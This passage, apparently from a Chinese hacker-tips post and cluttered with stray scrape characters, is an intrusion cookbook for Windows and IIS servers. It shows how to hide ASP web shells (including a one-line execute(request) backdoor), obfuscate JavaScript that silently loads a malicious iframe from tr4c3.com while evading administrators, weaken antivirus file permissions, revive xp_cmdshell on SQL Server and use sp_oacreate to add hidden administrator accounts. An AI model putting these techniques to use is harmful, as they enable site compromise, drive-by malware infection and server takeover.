! s, U& _, }2 k# o- H用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。/ Z) L9 h2 Q/ j7 x" T
$ O) G8 u/ W3 j
53、隐藏ASP后门的两种方法" r$ }/ x2 ^8 ]. N5 r
1、建立非标准目录:mkdir images..\ ]5 Q; Z* A- S$ n8 H( d' N
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* H: f' t P/ U$ Y" T
通过web访问ASP木马:http://ip/images../news.asp?action=login Z$ _! x. k' |; V0 `
如何删除非标准目录:rmdir images..\ /s% R, b2 u" @% k# C
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:7 ^/ }0 j" t& Y
mkdir programme.asp
% O1 d6 f! W9 m: I7 z( p新建1.txt文件内容:<!--#include file=”12.jpg”--># t# y4 v( t: u$ O) Y' Z
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
1 R3 N$ [, A0 k& rattrib +H +S programme.asp
. N; ^8 h. F* d& q# H; z通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt. Y0 G ^, D0 J/ E/ a2 d7 A$ H* C
: ~$ u g" P5 W- K, n% Y4 U. L
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。0 @6 \; _! Q8 e
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
" F( k$ H: j3 y9 A0 t1 U8 L: c
& _( S1 H7 b7 g) t6 R- W) s55、JS隐蔽挂马+ ?( D/ V; n9 c# G c+ e$ z. H$ w
1.# q7 C+ b3 F, S
var tr4c3="<iframe src=ht";; j3 F& u" k0 a0 Y( W. O
tr4c3 = tr4c3+"tp:/";" Q8 ]* R" P* n* e
tr4c3 = tr4c3+"/ww";% J3 t0 i! u0 l
tr4c3 = tr4c3+"w.tr4";& r! A1 t: a5 u% f8 D
tr4c3 = tr4c3+"c3.com/inc/m";3 _! ]+ f* T: T0 y' o
tr4c3 = tr4c3+"m.htm style="display:none"></i";1 g9 V9 h. Q! B: u1 P
tr4c3 =tr4c3+"frame>'";1 k9 n2 j' f* b/ B9 H
document.write(tr4c3);
1 r$ A- z4 U& G/ X1 R! |避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。 p9 x& m; A0 d
2 a$ o3 y2 p8 v M' h5 p
2.- v! V9 s* e- t Z" `6 y" _
转换进制,然后用EVAL执行。如& G, I, B) K6 P9 }5 H! b2 C
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
" t8 H! Z; V3 A+ F, n# b不过这个有点显眼。) I f+ i' m% J+ E+ @
3.9 W+ l- k% F+ z! _% q
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
6 }3 n& p& r$ b0 v* j _' a最后一点,别忘了把文件的时间也修改下。
, @9 I( Q- G, b: L6 \; s# ]( [) {# |( }) x: M2 j3 }
56.3389终端入侵常用DOS命令
, P! g; n3 Y/ o) ^taskkill taskkill /PID 1248 /t
* ]0 H: ? ~9 g9 f. ]) E" S: i1 B3 E! y. o9 T" Y( Q, \& w
tasklist 查进程
0 i. f7 E( }3 t' S' _% h* S$ q: K3 s, |( `
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
, t- B3 U' o& siisreset /reboot# M6 `; K6 C: M7 A
tsshutdn /reboot /delay:1 重起服务器* ^% Q5 C' ^. w
j5 X1 J% J7 ^9 Z5 [! G7 W& I
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,4 O5 U8 ?$ U2 s3 v
. [1 N/ n, E( X# H. W6 L" oquery user 查看当前终端用户在线情况
( g) X8 J* w; l. ?' q
) |; b- [, R7 u" ?' F0 x4 i要显示有关所有会话使用的进程的信息,请键入:query process * R3 D( M: ~* b2 X
/ I2 e- H7 H& ^
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2 g% H9 F# {- t1 R
7 M2 h: j, `. U5 p要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2% t* M: H, D! m, D$ n: e* i
- q; L( r) A; G; x6 o
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
1 v# P/ Q8 |1 p) z$ [: J4 s6 _& K1 z( u: ?; i! u; g7 N
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启' X; F G* e+ k$ G* k
. M3 t) H2 K$ p; ?0 U命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
9 `* L' r, Y! C) @3 c- ^3 i3 W* }& M# z6 R# l0 ]
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。8 ]' ^6 D' q+ O T5 x g
. H3 l$ l& V4 H* e k
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
" l" f& x' w% Q5 G3 `
' \5 b) n; p2 g$ N6 A/ c56、在地址栏或按Ctrl+O,输入:
8 D7 a' o7 M0 z' `8 C' }. ?javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
" `3 ?( P" |/ s+ Y3 P) k$ u3 n$ A
! \# B E, R! [' H源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。: T% g1 o1 I5 F9 M' s1 Z" [4 ~
- j, R1 u B! E+ {57、net user的时候,是不能显示加$的用户,但是如果不处理的话,( Y2 m) U8 @% _. Q- |* Y. T" Z
用net localgroup administrators是可以看到管理组下,加了$的用户的。
+ p9 O" h2 s+ u2 o$ X5 i6 v% \ ]5 f$ d+ p
58、 sa弱口令相关命令
& ^4 y9 x( k* x
" h! ?0 _% J+ q0 D一.更改sa口令方法:
, y% u x3 `0 p: Q6 H4 Y0 ~+ t用sql综合利用工具连接后,执行命令:
( Q, c/ p) Z' W7 s O- J+ Texec sp_password NULL,'20001001','sa'
1 e; e% X: t! A% V4 f, s" s(提示:慎用!)- o2 r2 Y' L$ o$ w# H+ E% m
) Q/ s0 M, l& H( `2 Y6 B$ V `
二.简单修补sa弱口令.
9 ]& ^& D9 w; \: W% {8 z: F* m1 ?5 S3 A
方法1:查询分离器连接后执行:6 o7 R0 F6 e: ?$ }) P. l- `
if exists (select * from7 n4 j/ T6 S" d1 u& D
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and: _1 b) K8 L' R* H& L3 w& \
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
t- c- j$ \; {, R" O: _4 v( {3 `; }$ g$ i, b( d. a( q9 `
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
! [; y7 E& k$ x: D7 |
' f- j5 w+ e9 d6 V P) k# }! |5 w9 fGO5 P6 w8 Q$ _4 U# [
, v0 V0 q1 q' L2 f0 F然后按F5键命令执行完毕9 M/ h9 W- B0 i; q% d3 e$ X( ?
' N# D4 g: t% y s$ B/ ?方法2:查询分离器连接后
+ \7 h7 `# x* ?9 I% }0 X* u第一步执行:use master8 ?' b1 @- q4 ?, K$ g {
第二步执行:sp_dropextendedproc 'xp_cmdshell'
* [& ^/ C% K2 N9 ^" w* U然后按F5键命令执行完毕4 T( ^9 D6 {# X5 A8 x/ y/ V
& F1 i) R5 e1 p6 \
0 t/ I7 A$ T- m2 _& ~5 x+ l三.常见情况恢复执行xp_cmdshell.- D" I% M3 ?. F9 M/ \
1 w3 ?' y( m6 Z
7 p. D K$ a9 q4 F1 未能找到存储过程'master..xpcmdshell'.7 k/ S1 a5 K" S, W8 j: o9 R
恢复方法:查询分离器连接后,4 S* F3 V0 ?$ W: w8 g" `
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int! D; w, t+ `4 F r8 l: g; g
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- K5 G# p# X. T. u8 Y4 Y- C然后按F5键命令执行完毕" `2 X! I+ O& i% d
* V) O' s! J$ V* x/ }: W2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)7 u* c4 J+ M: {3 Z5 c, c3 ?
恢复方法:查询分离器连接后,
* k+ ]$ m& y' z7 ^. m$ W; y! W第一步执行:sp_dropextendedproc "xp_cmdshell"
5 v9 Q6 [* U' m& S; m* J! \第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" I5 |1 ]( P+ w+ N4 L0 c3 x P然后按F5键命令执行完毕
8 I2 u w, w* t! H/ j0 ]- i4 {( [- d ^6 |" w
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)# l' F$ [* K- i3 f2 d9 [
恢复方法:查询分离器连接后,
0 z- e: r* H' H, ~; P第一步执行:exec sp_dropextendedproc 'xp_cmdshell'- Z5 S, x& C0 k! ^$ i
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
4 D6 n+ G3 I1 B然后按F5键命令执行完毕
( W! C+ J) l: [: k
4 i( i; M( g+ G; e四.终极方法.
$ B. E' |9 }4 q! V如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
" N' C( D. o6 M8 B" r! o查询分离器连接后,5 ]3 c) d4 [# G% e1 l
2000servser系统:
& b6 a# Z& ?5 B) ^: x- f5 P: Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 T e. D% I# s6 V& m/ D6 o! B8 M! C3 [% u+ E" S: d# z- K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ \4 Z# ]( @4 n% ]3 F a
' W8 G' A1 |2 c8 e& |$ U, E( Q
xp或2003server系统:
" P9 e) o( s* b; J
2 K. R! L* e& W( Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
. V+ d; w3 r" d h2 i4 k/ u1 z3 \0 I" f8 A5 ]. W; Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'2 O! J9 v! y5 J O% H( I, K
|